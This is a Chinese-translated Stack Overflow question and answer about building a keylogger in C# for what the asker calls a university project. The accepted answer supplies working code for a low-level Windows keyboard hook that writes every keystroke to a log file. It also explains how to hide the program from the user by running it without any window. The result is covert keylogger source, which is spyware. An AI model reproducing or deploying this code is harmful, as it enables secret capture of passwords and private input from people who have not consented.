我有一个大学项目需要用 C# 创建某种类型的键盘记录器,我的意思是从用户那里获取所有键盘输入并将它们放在一个文件中,在这种情况下输入是文本也需要是加密。此应用程序需要是一个 Windows 服务,我是 Windows 服务的新手,但我已经成功地使用 Visual Studio 2015 创建了一个 Windows 服务。现在的问题出在键盘记录器上,我已经搜索了很长时间,但大多数我见过的键盘记录器是使用 Windows 窗体而不是 Windows 服务开发的。我有这个功能:
protected override void OnStart(string[] args)
{
System.IO.File.Create(AppDomain.CurrentDomain.BaseDirectory + "OnStart.txt");
}
我在这里所做的是,当服务启动时,它会在将保存或记录用户所有输入的应用程序目录中创建一个名为 Output 的新 .txt 文件。
有人可以帮助我或将我重定向到某个地方,以便我可以使用 Windows 服务创建一个简单的键盘记录器吗?我已经设法使用一个计时器创建了一个带有 Windows 窗体的键盘记录器,它每秒都会保存数据,但是使用 Windows 服务对我来说似乎有点困难。
最佳答案
来自 this question出于安全原因,似乎无法通过服务执行此操作。
但是,您可以创建一个使用键盘 Hook 且不显示任何控制台或窗口的程序,这意味着它将对用户隐藏(就像服务一样)。
为此,首先声明一些字段:
private const int WH_KEYBOARD_LL = 13;
private const int WM_KEYDOWN = 0x0100;
private static LowLevelKeyboardProc _proc = HookCallback;
private static IntPtr _hookID = IntPtr.Zero;
private delegate IntPtr LowLevelKeyboardProc(int nCode, IntPtr wParam, IntPtr lParam);
然后导入这些本地方法:
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool UnhookWindowsHookEx(IntPtr hhk);
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr SetWindowsHookEx(int idHook,
LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId);
[DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode,
IntPtr wParam, IntPtr lParam);
[DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
private static extern IntPtr GetModuleHandle(string lpModuleName);
创建这些方法,其中 HookCallback
将处理任何检测到的按键(因此在注释中写入文件)
private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam)
{
if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN)
{
int vkCode = Marshal.ReadInt32(lParam);
var keyName = Enum.GetName(typeof(Keys), vkCode);
var path = @"C:\test\logfile.txt";
// Handle the key press here
var text = ((Keys)vkCode).ToString();
File.AppendAllText(path, text);
}
return CallNextHookEx(_hookID, nCode, wParam, lParam);
}
SetHook
基本上为我们订阅了键盘钩子(Hook):
private static IntPtr SetHook(LowLevelKeyboardProc proc)
{
using (Process curProcess = Process.GetCurrentProcess())
using (ProcessModule curModule = curProcess.MainModule)
{
return SetWindowsHookEx(WH_KEYBOARD_LL, proc,
GetModuleHandle(curModule.ModuleName), 0);
}
}
最后,将这些行添加到您的 Main
方法中:
_hookID = SetHook(_proc);
Application.Run();
UnhookWindowsHookEx(_hookID);
现在要使程序不可见,只需将 Output Type
属性更改为 Windows Application
而不是 Console Application
。
希望对你有帮助
关于c# - Windows 服务键盘记录器,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/43712486/